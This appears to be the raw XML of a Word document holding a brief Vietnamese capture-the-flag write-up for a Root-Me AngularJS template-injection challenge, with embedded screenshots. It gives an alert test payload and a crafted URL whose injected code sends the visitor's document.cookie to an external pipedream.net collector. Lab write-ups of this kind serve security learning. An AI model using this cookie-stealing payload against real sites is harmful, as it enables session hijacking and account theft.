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D573" w14:textId="5072CACB" w:rsidR="001B5FBB" w:rsidRDefault="001B5FBB">
      <w:r>
        <w:t>Đầu tiên vào trang web thì không thấy filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0CB4B4" w14:textId="5EDAAAE2" w:rsidR="004E48B2" w:rsidRDefault="001B5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35659936" wp14:editId="4B1BA43C">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="143498919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9193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887B" w14:textId="7D9C1A47" w:rsidR="001B5FBB" w:rsidRDefault="001B5FBB">
      <w:r>
        <w:t xml:space="preserve">Thực hiện tấn công bằng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5FBB">
        <w:t>{{$on.constructor("alert(1)")()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377EC340" w14:textId="77777777" w:rsidR="001B5FBB" w:rsidRDefault="001B5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11EF1642" wp14:editId="2E5F83A4">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="41586546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65460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2E19" w14:textId="2BB7847C" w:rsidR="001B5FBB" w:rsidRDefault="00234E5F" w:rsidP="00234E5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00D5364C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          </w:rPr>
          <w:t>http://challenge01.root-me.org/web-client/ch35/?name={{$on.constructor("document.location.href=\"https://eon5wu9esj2rcgn.m.pipedream.net?cookie=\"+document.cookie")()}}</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55B4C427" w14:textId="3F29F26A" w:rsidR="00234E5F" w:rsidRDefault="00234E5F" w:rsidP="00234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Ta sẽ thực hiện truyền payload vào concat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745A9B8" w14:textId="64DF800C" w:rsidR="00234E5F" w:rsidRDefault="00234E5F" w:rsidP="00234E5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AFEC9E" wp14:editId="788A189F">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18871761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761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48F6" w14:textId="4C1FA212" w:rsidR="00234E5F" w:rsidRDefault="00234E5F" w:rsidP="00234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 có được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74996986" w14:textId="4EABBC4A" w:rsidR="00234E5F" w:rsidRPr="00E04AED" w:rsidRDefault="00234E5F" w:rsidP="00234E5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D63323C" wp14:editId="47718913">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="161953853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38537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E5F" w:rsidRPr="00E0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F1"/>
    <w:rsid w:val="001B5FBB"/>
    <w:rsid w:val="00234E5F"/>
    <w:rsid w:val="004E48B2"/>
    <w:rsid w:val="007D53F1"/>
    <w:rsid w:val="00BE6532"/>
    <w:rsid w:val="00E0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7380"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{126281AE-CC74-4812-B5B3-9ED80AE0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allenge01.root-me.org/web-client/ch35/?name=%7b%7b$on.constructor(%22document.location.href=\%22https://eon5wu9esj2rcgn.m.pipedream.net?cookie=\%22+document.cookie%22)()%7d%7d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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-06T08:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-06T08:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>